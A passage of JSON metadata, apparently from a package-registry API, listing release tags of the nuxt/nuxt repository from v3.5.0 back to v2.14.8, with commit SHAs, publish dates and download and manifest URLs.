//codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"ta